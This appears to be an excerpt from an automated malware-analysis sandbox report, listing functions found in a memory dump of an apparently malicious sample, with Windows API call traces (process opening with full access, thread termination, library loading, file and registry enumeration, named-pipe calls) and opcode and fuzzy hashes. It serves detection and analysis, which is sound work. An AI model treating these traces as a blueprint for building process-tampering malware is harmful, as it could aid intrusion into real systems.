                                                            • Opcode ID: f2480f1513804ee7ff225b9b1ae500b8b8be9d2a48212c291dfe2857c549a9dc
                                                            • Instruction ID: 219c99c73f2721b060431d3386e4ff658c29b9ec9db5a881759ae6124da55e4b
                                                            • Opcode Fuzzy Hash: f2480f1513804ee7ff225b9b1ae500b8b8be9d2a48212c291dfe2857c549a9dc
                                                            • Instruction Fuzzy Hash: 33111E32200209AFDF018F9ADC809DA7BA9FF4C3B4B058165FD5C96120C775E821DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAACFC, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BAC5E7: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC606
                                                              • Part of subcall function 04BAC5E7: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC611
                                                              • Part of subcall function 04BAC5E7: _wcsupr.NTDLL ref: 04BAC61E
                                                              • Part of subcall function 04BAC5E7: lstrlenW.KERNEL32(00000000), ref: 04BAC626
                                                            • ResumeThread.KERNEL32(00000004,?,04BAD280,?), ref: 04BAAD11
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 3646851950-0
                                                            • Opcode ID: bcc555042cd153b783a3e8c348dc02f4503b0d8ce663a4cefcfd6aaccfaff9e9
                                                            • Instruction ID: e337a6902ca260304f00dd857d3281c668ac420c8fb6f2b5da3ebf9138a97bb3
                                                            • Opcode Fuzzy Hash: bcc555042cd153b783a3e8c348dc02f4503b0d8ce663a4cefcfd6aaccfaff9e9
                                                            • Instruction Fuzzy Hash: FED05E74208301AAE7212A22CD55B1A7EA1EF08A99F00889DFAC590060C3F2A830E520
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC4678, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 04BC466A
                                                              • Part of subcall function 04BC477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04BA0000), ref: 04BC47F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: c6f02718df9003ef77dc5418673ab15a9259237dd7211591aa7e4c66b47f80bd
                                                            • Instruction ID: 363e3ab148c2c0e33f470b976fbd67604c9cfb331d585ea37600e9a129071285
                                                            • Opcode Fuzzy Hash: c6f02718df9003ef77dc5418673ab15a9259237dd7211591aa7e4c66b47f80bd
                                                            • Instruction Fuzzy Hash: ABA011C23A8002FC320832202CE2CBA020CC0C2E2233088EFE802C0020A8803E000830
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC465D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 04BC466A
                                                              • Part of subcall function 04BC477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04BA0000), ref: 04BC47F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: 6e93fd07155f00536d8993fc65d0861644a2e1d968b23bd8da6431a592f6b289
                                                            • Instruction ID: ec04e0b025545d54c1fb2bed304a6ea0d968268d09c458979fc87983070d464d
                                                            • Opcode Fuzzy Hash: 6e93fd07155f00536d8993fc65d0861644a2e1d968b23bd8da6431a592f6b289
                                                            • Instruction Fuzzy Hash: 6CA011C23A8002BC320832202CE2CBA020CC0C2E223B080EFF800C0020A8803E000830
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC3C35, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: f5080f43544f7688c19551cc5b12db5310c586a434b44ff85f5269e18fa18802
                                                            • Instruction ID: 22c0d864b6336b6aed667dd0974e331a36b72abae05adb4f1cda3a401579d2a7
                                                            • Opcode Fuzzy Hash: f5080f43544f7688c19551cc5b12db5310c586a434b44ff85f5269e18fa18802
                                                            • Instruction Fuzzy Hash: C5B01231004100EBCA014B10ED85F0D7B71F768701F014012B204910A082399C60EF34
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC3C4A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: ddb86026ee232055b4493fddfd0cff16ea640e289eea4e11d0ff3dd23de95d00
                                                            • Instruction ID: 5018c0b6f20e8ef03e187a9fd7c9be529841f905ca62cbaacb869c32475e552f
                                                            • Opcode Fuzzy Hash: ddb86026ee232055b4493fddfd0cff16ea640e289eea4e11d0ff3dd23de95d00
                                                            • Instruction Fuzzy Hash: AEB01231004100EBCA114B10ED85F0D7B61F758701F014412B204910A082399C60EF24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA748F, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,04BB5AB0,00000000,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BA7521
                                                              • Part of subcall function 04BA96CA: memcpy.NTDLL(04BB5AB0,04BB5AB0,00000000,04BB5AB0,04BB5AB0,04BB5AB0,?,?,?,04BA74D8,00000000,00000001,00000000,?,04BB5AB0,00000000), ref: 04BA96ED
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                            • String ID:
                                                            • API String ID: 1301464996-0
                                                            • Opcode ID: fc65fbbf0459a5e1e241a055e6de7eb231c20711fce7d3239dd0262e3b6d5279
                                                            • Instruction ID: 4e2479066ce50b85efe8adadb6aab4fdfa4b4e72e57810718bea323e83557636
                                                            • Opcode Fuzzy Hash: fc65fbbf0459a5e1e241a055e6de7eb231c20711fce7d3239dd0262e3b6d5279
                                                            • Instruction Fuzzy Hash: 4C119171A1C205EFDB25DB59D8D0EBD7BB8EB48311F2004AAF6069B240DB74FD109BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC3B6E, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04BCC214,00000018,04BB98AB,05C88E6E,?,04BB98AB,05C88E6E,?,04BB98AB,05C88E6E,?,?,?,?,04BB98AB), ref: 04BC3C23
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 6b115516aef9f4faee7d7b6bc55e3577da04e1d1423105cfa9c082819affb775
                                                            • Instruction ID: 39f929fe0b81da3fa0a447a4a464f5197f4252cd2efeb1acfddcb99dbc1e5df3
                                                            • Opcode Fuzzy Hash: 6b115516aef9f4faee7d7b6bc55e3577da04e1d1423105cfa9c082819affb775
                                                            • Instruction Fuzzy Hash: 82119071640105ABDF10DF49E8C1C963FB9E7A8325708916BA91D8F160D734AD15CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC398C, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,04BA83C0,04BAD17E,00000000,00000000), ref: 04BC39FD
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB50
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB5F
                                                              • Part of subcall function 04BBAE65: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBAE8B
                                                              • Part of subcall function 04BBAE65: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BBAE97
                                                              • Part of subcall function 04BBAE65: GetModuleHandleA.KERNEL32(?,05C89732,?,00000000,00000000), ref: 04BBAEB7
                                                              • Part of subcall function 04BBAE65: GetProcAddress.KERNEL32(00000000), ref: 04BBAEBE
                                                              • Part of subcall function 04BBAE65: Thread32First.KERNEL32(00000001,0000001C), ref: 04BBAECE
                                                              • Part of subcall function 04BBAE65: CloseHandle.KERNEL32(00000001), ref: 04BBAF16
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                            • String ID:
                                                            • API String ID: 2627809124-0
                                                            • Opcode ID: e8ea0908065de3f067d308ec226f8a284ae4155e3bd9160b41c3f86c15836328
                                                            • Instruction ID: 9b7819fa08d134972a51d4f8cd1f52df353d01375d150aa0416ba2a7c4d2db2e
                                                            • Opcode Fuzzy Hash: e8ea0908065de3f067d308ec226f8a284ae4155e3bd9160b41c3f86c15836328
                                                            • Instruction Fuzzy Hash: 07014F72614108FF9B11DBA9ECC8CAFBBFCEB59658750419AF501E3200EA75BE118B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBDB4F, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BA83BB,04BAD17E,00000000,00000000), ref: 04BBDBC5
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB50
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB5F
                                                              • Part of subcall function 04BAA6F7: lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                              • Part of subcall function 04BAA6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                              • Part of subcall function 04BAA6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                              • Part of subcall function 04BAA6F7: GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                              • Part of subcall function 04BAA6F7: HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 730886825-0
                                                            • Opcode ID: 5865a96a85ab44650828d253a449bf84f06ff346a7f26a52937a32652d5a8f00
                                                            • Instruction ID: 6175cb6ecfe89ed201f7f3ae594e9e392e2e5d7a783235c60a94a27094568923
                                                            • Opcode Fuzzy Hash: 5865a96a85ab44650828d253a449bf84f06ff346a7f26a52937a32652d5a8f00
                                                            • Instruction Fuzzy Hash: 79015E35514204FBEB21DB69DD85FEF7BBCEB09714F100196B641A7180EAB5BE00CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BABF3F, Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BABF5D
                                                              • Part of subcall function 04BB7629: memset.NTDLL ref: 04BB764F
                                                              • Part of subcall function 04BB7629: memcpy.NTDLL ref: 04BB7677
                                                              • Part of subcall function 04BB7629: GetLastError.KERNEL32(00000010,00000218,04BC4EAD,00000100,?,00000318,00000008), ref: 04BB768E
                                                              • Part of subcall function 04BB7629: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BC4EAD,00000100), ref: 04BB7771
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 4290293647-0
                                                            • Opcode ID: 5917ebd81ef036e55ed771ea8887ca8a4d5ef93f1c54c7afab4266966a67646c
                                                            • Instruction ID: 85d3046ed641ce442c7fb0872f2bdf026757721d0e1d755d510d5a3faf83593f
                                                            • Opcode Fuzzy Hash: 5917ebd81ef036e55ed771ea8887ca8a4d5ef93f1c54c7afab4266966a67646c
                                                            • Instruction Fuzzy Hash: 4701D1706093086BE7219F29DC80B9B3BE8EF85718F04846AFD5997240D7B1F9248AA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBAB41, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BBAB4B
                                                              • Part of subcall function 04BBAB7B: RegOpenKeyExA.KERNEL32(04BBAB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABC2
                                                              • Part of subcall function 04BBAB7B: RegOpenKeyExA.ADVAPI32(04BBAB63,04BBAB63,00000000,00020019,80000001,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABD8
                                                              • Part of subcall function 04BBAB7B: RegCloseKey.ADVAPI32(80000001,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBAC21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closememset
                                                            • String ID:
                                                            • API String ID: 1685373161-0
                                                            • Opcode ID: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction ID: 0460e049ef18aafb059c986253970450f155b90c95e2d946e7bb19a79ae509b0
                                                            • Opcode Fuzzy Hash: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction Fuzzy Hash: 07E0EC30640108BBEB20AE54CC81FE97755DB08758F108055BE595A251DAF1B660CAD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA166D, Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C,?,00000318), ref: 04BA1687
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 6d7c8478aec995931bc3f6618877e9528379256765cd7cb594d8538c9d66d08d
                                                            • Instruction ID: abc0f5375806667e871d583e13c770a875ad9d8ee59c48967a8717f551868495
                                                            • Opcode Fuzzy Hash: 6d7c8478aec995931bc3f6618877e9528379256765cd7cb594d8538c9d66d08d
                                                            • Instruction Fuzzy Hash: 9FD01731D00229EBCB209FA9D885D9EFBB0FF18710F608264E460B7190C2306D21CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 04BB4658, Relevance: 16.9, APIs: 11, Instructions: 376memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB468E
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB46C0
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB46F2
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4724
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4756
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4788
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB47BA
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB47EC
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB481E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000), ref: 04BB48C5
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB48F0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: e2ab6326ddd381fe69ccb84bfcb110c2bf01e4582494a1335a01d1c5b7f5e779
                                                            • Instruction ID: 2a12e8947b628bb21e8c33f3f0336cab915795f21db8b46cfba14f0343306be2
                                                            • Opcode Fuzzy Hash: e2ab6326ddd381fe69ccb84bfcb110c2bf01e4582494a1335a01d1c5b7f5e779
                                                            • Instruction Fuzzy Hash: 82C1A261700215AFE710EF75DCC49BB26ECFB1D75075589A6A889C7202EAB4F845CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAD812, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,04BCC1E4,04BC05A4,04BCC1E4,00000000,?,?,04BB22F6), ref: 04BAD845
                                                            • GetLastError.KERNEL32(?,04BCC1E4,04BC05A4,04BCC1E4,00000000,?,?,04BB22F6), ref: 04BAD853
                                                            • NtSetInformationProcess.NTDLL ref: 04BAD8AD
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04BAD8EC
                                                            • GetProcAddress.KERNEL32(?), ref: 04BAD90D
                                                            • TerminateThread.KERNEL32(?,00000000,04BB22F6,00000004,00000000), ref: 04BAD964
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD97A
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD9A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                            • String ID:
                                                            • API String ID: 3529370251-0
                                                            • Opcode ID: dd3c9f8f4d1b45bb66f814949e1319d9ac978b95f05d14bbdaa4936a71f62974
                                                            • Instruction ID: cdf78d11f7a5d23627a4f549f5d53c16f2c2e0d692b3f830f7b18409d160fef2
                                                            • Opcode Fuzzy Hash: dd3c9f8f4d1b45bb66f814949e1319d9ac978b95f05d14bbdaa4936a71f62974
                                                            • Instruction Fuzzy Hash: 95417D70608345AFDB10DF25C884A1EBBF9FB98348F00096AF595A2160D774EA68CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBCC4A, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,04BA114F,?), ref: 04BA2B66
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BA2B83
                                                            • FreeLibrary.KERNEL32(?), ref: 04BBCD80
                                                              • Part of subcall function 04BB7E67: lstrlenW.KERNEL32(?,00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7E74
                                                              • Part of subcall function 04BB7E67: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04BBCCC5,?,?), ref: 04BB7E9D
                                                              • Part of subcall function 04BB7E67: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04BB7EBD
                                                              • Part of subcall function 04BB7E67: lstrcpyW.KERNEL32(-00000002,?), ref: 04BB7ED8
                                                              • Part of subcall function 04BB7E67: SetCurrentDirectoryW.KERNEL32(?,?,?,?,04BBCCC5,?,?), ref: 04BB7EE4
                                                              • Part of subcall function 04BB7E67: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,04BBCCC5,?,?), ref: 04BB7EE7
                                                              • Part of subcall function 04BB7E67: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7EF3
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F10
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F2A
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F40
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F56
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F6C
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F82
                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 04BBCCD6
                                                            • lstrlenW.KERNEL32(?), ref: 04BBCCF2
                                                            • lstrlenW.KERNEL32(?), ref: 04BBCD0A
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BBCD23
                                                            • lstrcpyW.KERNEL32(00000002), ref: 04BBCD38
                                                              • Part of subcall function 04BC100F: lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC101F
                                                              • Part of subcall function 04BC100F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC1041
                                                              • Part of subcall function 04BC100F: lstrcpyW.KERNEL32(00000000,00000000), ref: 04BC106D
                                                              • Part of subcall function 04BC100F: lstrcatW.KERNEL32(00000000,?), ref: 04BC1080
                                                            • FindNextFileW.KERNEL32(?,00000010), ref: 04BBCD60
                                                            • FindClose.KERNEL32(00000002), ref: 04BBCD6E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                            • String ID:
                                                            • API String ID: 1209511739-0
                                                            • Opcode ID: af7c95bb4bd6d2270e842b3d2400c98827112edbfb4383111cf06418864b0e4c
                                                            • Instruction ID: 6745fe9bfc017e7abecfe3720ed05f93d4dfa4e1ed58bb66becb03ed988b81c3
                                                            • Opcode Fuzzy Hash: af7c95bb4bd6d2270e842b3d2400c98827112edbfb4383111cf06418864b0e4c
                                                            • Instruction Fuzzy Hash: 0E416A714083069BDB11DF24D884A6FBFF8FF88705F04496EF994A2150DB74E919EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB198F, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 04BB19A7
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
